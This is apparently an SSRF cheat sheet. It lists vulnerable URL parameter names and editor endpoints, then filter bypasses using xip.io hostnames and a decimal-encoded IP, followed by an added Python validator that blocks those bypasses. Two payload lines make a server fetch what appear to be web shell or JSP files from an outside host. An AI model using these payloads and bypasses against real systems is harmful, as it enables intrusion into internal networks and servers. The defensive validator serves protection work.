URL fields (parameters) associated with SSRF
relativePath
url
site
path
message=[img]http://myserver/wshell.php?logo.jpg[/img]
query
src
src_url
sr
id
vtTopicId //ebs
operator(weblogic:SearchPublicRegistries)
inputFile
column_url
preview
sIconUrl/sUrl
picPath
qrcodeUrl
fileName
upfile(ueditor/jsp/getRemoteImage.jsp?upfile=http://**.**.**.**/sex.jsp%23.jpg)
img
source
pageurl
redirect
Ueditor imageUp.jsp controller.php getRemoteImage.jsp source[] upfile
eWebEditor eWebEditor_UploadText
xheditor saveremoteimg
proxy?s=
view_img.php
imgurl
link
href
apiurl
resourceUrl
SSRF bypasses:
http://10.13.199.124.xip.io:8080
www.127.0.0.1.xip.io
http://168675196:8080 (the IP address can be converted to decimal form to bypass filters)
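
A server-side check that catches the three bypass forms listed above, as an added example (not from the original page). It normalizes decimal-integer hosts and validates the resolved address instead of matching on the hostname string. The names check_url, literal_ip, fake_resolver and the FAKE_DNS table are assumptions made for this example.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed stand-in for DNS so the example runs offline. xip.io-style
# wildcard names resolve to the IP address embedded in the hostname.
FAKE_DNS = {
    "10.13.199.124.xip.io": ["10.13.199.124"],
    "www.127.0.0.1.xip.io": ["127.0.0.1"],
    "example.com": ["93.184.216.34"],  # constructed public address
}

def fake_resolver(host):
    return FAKE_DNS.get(host, [])

def dns_resolver(host):
    """Real lookup for production use (not exercised in this example)."""
    try:
        return sorted({ai[4][0] for ai in socket.getaddrinfo(host, None)})
    except socket.gaierror:
        return []

def literal_ip(host):
    """Parse dotted or single-integer (decimal) IP literals, else None."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        if host.isascii() and host.isdigit() and int(host) <= 0xFFFFFFFF:
            return ipaddress.ip_address(int(host))  # 168675196 -> 10.13.199.124
        return None

def is_internal(ip):
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_reserved or ip.is_unspecified or ip.is_multicast)

def check_url(url, resolver=dns_resolver):
    """Return (allowed, reason) for a user-supplied fetch target."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False, "unsupported scheme or missing host"
    ip = literal_ip(parts.hostname)
    addrs = [ip] if ip else [ipaddress.ip_address(a) for a in resolver(parts.hostname)]
    if not addrs:
        return False, "host does not resolve"
    for addr in addrs:
        if is_internal(addr):
            return False, f"{parts.hostname} maps to internal address {addr}"
    return True, "ok"
```

The fetching code should then connect to the address that was validated rather than resolving the name a second time, since a second lookup can return a different answer.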